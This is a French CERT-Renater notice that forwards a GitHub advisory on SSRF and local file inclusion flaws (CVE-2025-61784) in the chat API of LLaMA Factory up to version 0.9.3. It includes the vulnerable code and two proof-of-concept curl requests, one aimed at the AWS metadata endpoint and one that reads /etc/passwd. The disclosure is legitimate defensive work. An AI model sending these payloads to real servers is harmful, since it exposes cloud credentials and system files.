Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2025/VULN674
_____________________________________________________________________

DATE                : 08/10/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running LLaMA Factory versions prior to
                                            0.9.4.

=====================================================================
https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-527m-2xhr-j27g
_____________________________________________________________________

Critical SSRF and LFI Vulnerabilities in LLaMA Factory's Chat API
High
hiyouga published GHSA-527m-2xhr-j27g Oct 7, 2025

Package
llamafactory (pip)

Affected versions
<=0.9.3

Patched versions
0.9.4


Description

Summary

A Server-Side Request Forgery (SSRF) vulnerability in the chat API
allows any authenticated user to force the server to make arbitrary
HTTP requests to internal and external networks. This can lead to
the exposure of sensitive internal services, reconnaissance of the
internal network, or interaction with third-party services. The
same mechanism also allows for a Local File Inclusion (LFI)
vulnerability, enabling users to read arbitrary files from the
server's filesystem.


Details

The vulnerability exists in the _process_request function within
src/llamafactory/api/chat.py. This function is responsible for
processing incoming multimodal content, including images, videos,
and audio provided via URLs.

The function checks if the provided URL is a base64 data URI or a
local file path (os.path.isfile). If neither is true, it falls
back to treating the URL as a web URI and makes a direct HTTP GET
request using requests.get(url, stream=True).raw without any
validation or sanitization of the URL.

Vulnerable Code Snippets in _process_request:

# ...
        elif input_item.type == "image_url":
            # ...
            else:  # web uri
                image_stream = requests.get(image_url, stream=True).raw
# ...
        elif input_item.type == "video_url":
            # ...
            else:  # web uri
                video_stream = requests.get(video_url, stream=True).raw
# ...
        elif input_item.type == "audio_url":
            # ...
            else:  # web uri
                audio_stream = requests.get(audio_url, stream=True).raw
# ...

This vulnerable function is called by create_chat_completion_response
and create_stream_chat_completion_response, which are in turn called
by the public-facing /v1/chat/completions API endpoint in
src/llamafactory/api/app.py. A user can craft a request to this
endpoint containing a malicious URL in the messages payload to trigger
the vulnerability.


PoC

To reproduce the vulnerability, send a POST request to the
/v1/chat/completions endpoint with a JSON payload containing a URL that
points to an internal or controlled external service.

Start the LLaMA Factory API server.

Use curl to send the malicious request. The following example uses a URL
pointing to the AWS metadata service, a common SSRF attack vector.

SSRF Payload:

curl -X POST "http://127.0.0.1:8000/v1/chat/completions" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your_api_key" \
-d '{
  "model": "your-model-name",
  "messages": [
    {
      "role": "user",
      "content": [
        {
          "type": "text",
          "text": "What is in this image?"
        },
        {
          "type": "image_url",
          "image_url": {
            "url": "http://169.254.169.254/latest/meta-data/"
          }
        }
      ]
    }
  ]
}'

LFI Payload:

curl -X POST "http://127.0.0.1:8000/v1/chat/completions" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your_api_key" \
-d '{
  "model": "your-model-name",
  "messages": [
    {
      "role": "user",
      "content": [
        {
          "type": "text",
          "text": "What is in this image?"
        },
        {
          "type": "image_url",
          "image_url": {
            "url": "/etc/passwd"
          }
        }
      ]
    }
  ]
}'

The server will make a request to the specified URL or read
the specified local file.


Impact

Vulnerability Type: Server-Side Request Forgery (SSRF) and
Local File Inclusion (LFI).

Impacted Component: The API server, specifically the
/v1/chat/completions endpoint.

Who is impacted: Any user who can send requests to the chat
API. The vulnerability allows an attacker to bypass firewalls
and access internal network resources, query cloud metadata
services for credentials, or read sensitive files on the
server. The severity is critical.


Severity
High
7.6/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
Low
Availability
Low
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

CVE ID
CVE-2025-61784

Weaknesses
Weakness CWE-22
Weakness CWE-918


Credits

    @d3do-23 d3do-23 Reporter
    @kexinoh kexinoh Reporter
    @lonelyuan lonelyuan Reporter



=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================